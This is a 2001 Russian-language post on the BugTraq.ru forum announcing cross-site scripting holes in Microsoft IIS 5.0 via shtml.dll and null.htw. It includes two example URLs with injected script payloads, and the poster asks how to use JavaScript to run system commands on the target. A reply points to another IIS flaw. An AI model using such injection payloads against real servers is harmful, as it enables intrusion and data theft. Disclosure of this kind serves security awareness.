информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
Сетевые кракеры и правда о деле ЛевинаАтака на Internet
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Три миллиона электронных замков... 
 Doom на газонокосилках 
 Умер Никлаус Вирт 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / miscellaneous
Имя Пароль
ФОРУМ
если вы видите этот текст, отключите в настройках форума использование JavaScript
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
И еще одна: Microsoft IIS CGI Filename Decode Error Vulnerability. Подробное описание завтра на www.urlteam.chat.ru. Заходите.(-). 16.05.01 00:09  Число просмотров: 1509
Автор: Dr. Access Sava Статус: Незарегистрированный пользователь
<"чистая" ссылка>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<miscellaneous>
Новай дыра в IIS 5.0!!! 15.05.01 16:55  
Автор: Sec Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Уязвимые системы: M$ IIS 5.0

Местонахождение: shtml.dll; null.htw

Уязвимость:
Свеженькие дырки в IIS 5.0 позволяют нам снова творить чудеса =)) Админам остается только радоваться за раздолбайство мЕЛКОсОФТА ХЫ =))

Использование:
1. В URL специального вида можно включить javascript, который будет передан атакуемым сервером клиенту. Таким образом, можно в контексте клиента получить доступ к атакуемому серверу. Example:
http://www.deadmen.com/_vti_bin/shtml.dll/ <SCRIPT> alert
('document.domain='+document.domain)</SCRIPT>

2. При обращении к .htw файлам URL может содержать скрипт. При выдаче диагностического сообщения URL не будет комментироваться, что позволяет выполнить скрипт в контексте сервера и, таким образом, например, получить/прочитать любой файл с сервера.
Example:
http://www.deadmen.com/null.htw?CiWebHitsFile=/default.htm&
CiRestriction="<SCRIPT>alert(document.domain)</SCRIPT>"


P.S.Как на javascript исполнить комманду в системе,сделать листинг директорий или просмотреть файл?
Ответы можно на opennet@newmail.ru
И еще одна: Microsoft IIS CGI Filename Decode Error Vulnerability. Подробное описание завтра на www.urlteam.chat.ru. Заходите.(-). 16.05.01 00:09  
Автор: Dr. Access Sava Статус: Незарегистрированный пользователь
<"чистая" ссылка>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1




Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2024 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach